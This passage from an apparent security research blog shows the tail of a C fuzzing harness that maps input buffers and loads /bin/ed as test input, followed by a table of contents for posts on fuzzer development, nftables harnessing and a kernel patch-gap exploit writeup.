        printf("** Err creating stat struct for '%s' during load\n", FUZZ_TARGET);
    }
}

// Used for testing, load /bin/ed into the input buffer and update its size info
#ifdef TEST
static void _test_func(void) {    
    // Open TEST_FILE for reading
    int fd = open(TEST_FILE, O_RDONLY);
    if (-1 == fd) {
        printf("** Failed to open '%s' during test\n", TEST_FILE);
        exit(-1);
    }

    // Attempt to read max input buf size
    ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);
    close(fd);

    // Update the input size
    *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;
}
#endif

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size
    _create_mem_mappings();

    // Setup global "legit" stat struct
    _setup_stat_struct();

    // If we're testing, load /bin/ed up into our input buffer and update size
#ifdef TEST
    _test_func();
#endif
}

The Human Machine Interface

Lucid Dreams II: Harness Development

Background

Adding Custom Syscall

Deciding Input Format

nftables Messages

Reaching nftables

Harness Init Code

Main Parsing Routine

Testing Harness

Conclusion

Lucid Dreams I: Lucid’s First Time Fuzzing

Background

Off-Blog Snapshot Dev

Old Snapshot Method Revisited

New Strategy for Linear Scaling

Redqueen for Compare Solving

Harness Development

Stage-1 Fuzzing: Dumb Byte Mutator

Stage 2 Fuzzing: More Mutation Strategies

Stage 3: Adding Compare Coverage with Redqueen

Issue-1

Issue-2

Issue-3

Issue-4

Stage 4: Fixing Redqueen

Redqueen Success Example

Stage 5: Adding Seeds, Mutator Tweaks, Misc.

Seeds

Mutator Tweaks

Hitcount Change

Corpus Sampling

Corpus Biasing

Conclusions

In General

Per Stage

Caveats

What’s Next?

Patch-Gapping the Google Container-Optimized OS for $0

Background

Patch Analysis

List Bug Analysis

Sched Bug Analysis

Shooting Myself in the Foot

Finally a UAF to Investigate

Exploit Plan

Gadget Hunting

Finding an Arbitrary Write Function

Putting It All-Together

Thanks && Misc

Exploit

Fuzzer Development 4: Snapshots, Code-Coverage, and Fuzzing

Background

Introduction

Snapshots

Triggering Snapshot Operations

Code Coverage Feedback

Environment/Target Setup

Conclusion

Fuzzer Development 3: Building Bochs, MMU, and File I/0

Background

Introduction

Syscall Infrastructure Update

Calling Convention Changes

Introducing Faults

Sandboxing Thread-Local-Storage

Building Bochs

Implementing a Simple MMU

Handling brk

Handling mmap and munmap

File I/O

Conclusion

Fuzzer Development 2: Sandboxing Syscalls

Introduction

Syscalls

C Library

Musl

Baby Steps

Execution Context Tracking

Program Start Under Lucid

`nftables` Messages

Reaching `nftables`

Handling `brk`

Handling `mmap` and `munmap`

Finding a Way to Hook `openat()`

Refining an `fopen64()` Hook